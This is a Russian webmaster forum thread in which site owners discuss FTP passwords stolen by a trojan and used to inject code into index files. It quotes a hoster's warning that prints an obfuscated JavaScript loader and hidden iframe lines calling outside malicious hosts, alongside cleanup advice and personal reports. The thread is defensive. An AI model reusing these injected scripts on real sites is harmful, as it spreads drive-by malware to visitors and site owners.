- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Участилось, что ломают фтп на площадках, ставят сапу и торгуют с площадок ссылками. в основном ставят код сапы, кто видел другой, пишите в топике - интересно увидеть другие варианты.
на различных хостингах: мастерхост, мажордомо, агава наблюдаю такую засаду. по сообщениям от хостеров, это вирус на компьютере, который может заражать сайты. и последующий сайт передает вирус пользователю и так далее, по цепочке. уже составлен план действий, который поможет при наличии признаков заражения привести все в порядок:
информация предоставлена хостингом majordomo:
вирусом-троянцем, использующим ваши данные для доступа FTP.
В индексные файлы добавляются строки вида:
<script>SSSS="267d262f267c277e [удалено] e7b7b7c2b";SS55S="";SSS55="function SS5SS() {S55SS=eval;SSS5S=unescape;SSSS5=String.fromCharCode;SSS5=Math.PI;S555S=parseInt;S55S5=S555S(~((SSS5&SSS5)|(~SSS5&SSS5)&(SSS5&~SSS5)|(~SSS5&~SSS5)));S555=S555S(((S55S5&S55S5)|(~S55S5&S55S5)&(S55S5&~S55S5)|(~S55S5&~S55S5))&1);SSSSS=S555<<S555;S5555=S55S5;for(SS5S=S55S5;SS5S<SSS55.length;SS5S-=-S555) S5555+=S555S(SSS55.charCodeAt(SS5S));S5555.toString();S5555%=SSS5S(0x64);for(SS555=S55S5;SS555<(SSSS.length>>SSSSS);SS555-=-S555) {S5S5S='';S5SSS='';for(S5S5=S55S5;S5S5<(S555<<SSSSS);S5S5-=-S555) if(S5S5<SSSSS) S5S5S+=SSSS.charAt(SS555*(SSSSS<<S555)+S5S5);else S5SSS+=SSSS.charAt(SS555*(S555<<SSSSS)+S5S5);SS55S+=SSSS5(SSS5S(0xFF)-S555S(SSS5S('%'+(((S555S(S5S5S,(SSSSS<<S555)<<SSSSS)^S5555)<15.5)?S55S5.toString():'')+Math.round(S555S(S5S5S,(SSSSS<<S555)<<SSSSS)^S5555).toString((SSSSS<<S555)<<SSSSS))+SSS5S('%'+(((S5555^S555S(S5SSS,SSSSS<<(S555+SSSSS)))<15.5)?S55S5.toString():'')+Math.round(S555S(S5SSS,SSSSS<<(S555+SSSSS))^S5555).toString(SSSSS<<(S555+SSSSS))),SSSSS<<(SSSSS+S555)));}try {S55SS(SS55S);} catch(e) {try{evalalert(SS55S);} catch(e) {SS5S5=S555;}try {if(SS5S5) {window.location='/';}} catch(e) {}}}SS5SS();";evalalert(SSS55);</script>
Пожалуйста, ознакомьтесь с нижеприведенными инструкциями и примите
соответствующие меры (включая смену паролей FTP):
Предупреждение о вирусе Downloader.JS.* c многочисленными модификациями и кражах паролей для FTP.
Данный тип вирусов распространяется следующим образом: вирус поражает компьютер клиента,
если тот зашел на инфицированный сайт небезопасным браузером (например, если не установлены
все последние обновления для браузера от его производителя).
После этого вирус отслеживает логины и пароли от FTP-соединений в популярных программах FTP-клиентах
(в большинстве случаев пароли передаются на сторону для использования с других IP-адресов).
А затем вирус (либо его клон с другого IP) подключается с данными логинами и паролями
по протоколу FTP и заменяет один или несколько индексных файлов на сервере,
дописывая в них свой код примерно такого содержания:
<iframe src="http://81.95.../traff/..." width=1 height=1></iframe>
Таким образом сайт инфицируется и также начинает участвовать в распространении вируса.
Вам необходимо проверить логи авторизаций в панели управления, если там только Ваши адреса,
то это означает, что Ваш компьютер заражен специальным видом троянцев, использующих
сохраненные FTP-пароли (в популярных FTP-клиентах) для изменения файлов на FTP-сервере.
Изменения файлов в частности включают в себя добавление в конец (начало, после тега body и т.п.)
индексного файла строки вида:
<!-- ~ --><iframe width="0" height="0" src="http://www.mdfc.info"></iframe><!-- ~ -->
Соответственно, http://www.mdfc.info это взломанный сайт либо сайт злоумышленников,
который вместо заглавной страницы выдает код вируса.
Советуем проверить Ваши компьютеры обновленными антивирусами и программами поиска троянских программ.
После этого необходимо изменить пароли FTP и заменить индексные файлы (index*.*, либо указанные в настройках)
на оригинальные либо сообщить нам, можем по запросу с контактного адреса аккаунта восстановить
данные из бекапа (до 2 недель давности). В случае, если в резервных копиях сохранены зараженные копии,
можем произвести поиск и чистку файлов от вирусного кода.
Попутно несколько ссылок:
http://vitafil.habrahabr.ru/blog/8158.html
http://www.host.ru/news/2007/03/19.html
http://www.viruslist.com/ru/viruses/encyclopedia?virusid=135929
отдельное спасибо сервису sape, которые блокируют сайты добавленные троянцем в систему(ну не троянцем, а мудачком, поотшибал бы пальчики на руках)
отдельное спасибо арбитражу вебманей, который блокирует кошельки злоумышленников, поскольку до выяснения обстоятельств средства уже заморожены. ждем только продолжения событий.
по возможности, если есть хостинги, которые пробиваются троянцем, указывайте... хостерам, думаю, стоит разослать предупреждение клиентам..
Volkpanda, ну и какое решение кроме как смена паролей на фтп и проверки компьютера на вирусы? :)
Решение - сразу установить сапу, чтобы никто другой не смог ее установить :D
Подтверждаю, у товарища подобным образом случилось.
Volkpanda, ну и какое решение кроме как смена паролей на фтп и проверки компьютера на вирусы? :)
Поучится как защитится от вирусов)
Ну а если уже мегагуру - менять хостера)
Взломали админку ВП. Засунули похожий код + очень много ссылок на порносайти наставили в файлах шаблона и в контенте.
Вирус злой вцепил. Вроде полечил, но через некоторое время интернет-провайдер пишет: "мы вас отключаем за спам" - за вечер 6Гб наспамил. Пришлось долго покопаться. Я в шоке ....
Volkpanda а за "пальчики" я только за!
Мой хостинг непричем, но зато он сегодня в другом отличился - 4 сайта в ауте. Все ссылки в эроре.
Короче - день удался как на работе, так и на форуме минус впарили (не люблю анонимов).
Еще б кирпич на голову упал...
нда. у меня седня почти точно также. только вирусы вместо сапы какие-то фигачит. 5 сайтов так заразилось. 2 уже в предупреждения гугла попали:(
нда. у меня седня почти точно также. только вирусы вместо сапы какие-то фигачит. 5 сайтов так заразилось. 2 уже в предупреждения гугла попали:(
два сайта лежат, вирусняк положил их.. тематика туризм.. заблокировали вход на хост по айпишнику для всех остальных.
basterr, Поставьте антивирусное ПО Данилова (Drweb) или KIS, постоянно обновляйте базы и не используйте следующие браузеры:Internet Explorer, Opera, Maxthon и подобные Google chrome и подобные. Также настоятельно рекомендуем не сохранять пароли где либо вообще.
При использовании Mozilla Firefox используйте следующие расширения:
FlashBlock ; Adblock plus ; Noscript
Надеюсь на понимание, спасибо.
Участилось, что ломают фтп на площадках, ставят сапу и торгуют с площадок ссылками. в основном ставят код сапы, кто видел другой, пишите в топике - интересно увидеть другие варианты.
Взломали сайт пару дней назад, заменили индексный файл.
Подмененный выводил какое то сообщение типа не посылайте SMS на такой то номер.
для тех кто не в танке. :)
Защита FTP с помощью .ftpaccess